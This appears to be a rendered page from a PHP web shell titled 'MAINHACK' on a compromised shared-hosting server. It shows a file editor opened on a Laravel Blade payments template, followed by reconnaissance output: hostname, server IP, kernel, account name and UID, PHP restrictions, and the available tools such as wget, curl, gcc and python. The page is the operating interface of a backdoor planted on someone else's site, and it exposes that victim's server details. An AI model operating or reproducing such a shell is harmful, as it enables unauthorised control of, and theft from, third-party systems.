[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: contact_payments_tab.blade.php
<table class="table table-bordered" id="contact_payments_table"> <thead> <tr> <th>@lang('lang_v1.paid_on')</th> <th>@lang('purchase.ref_no')</th> <th>@lang('sale.amount')</th> <th>@lang('lang_v1.payment_method')</th> <th>@lang('account.payment_for')</th> <th>@lang('messages.action')</th> </tr> </thead> <tbody> @forelse($payments as $payment) @php $count_child_payments = count($payment->child_payments); @endphp @include('contact.partials.payment_row', compact('payment', 'count_child_payments', 'payment_types')) @if($count_child_payments > 0) @foreach($payment->child_payments as $child_payment) @include('contact.partials.payment_row', ['payment' => $child_payment, 'count_child_payments' => 0, 'payment_types' => $payment_types, 'parent_payment_ref_no' => $payment->payment_ref_no]) @endforeach @endif @empty <tr> <td colspan="6" class="text-center">@lang('purchase.no_records_found')</td> </tr> @endforelse </tbody> </table> <div class="text-right" style="width: 100%;" id="contact_payments_pagination">{{ $payments->links() }}</div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285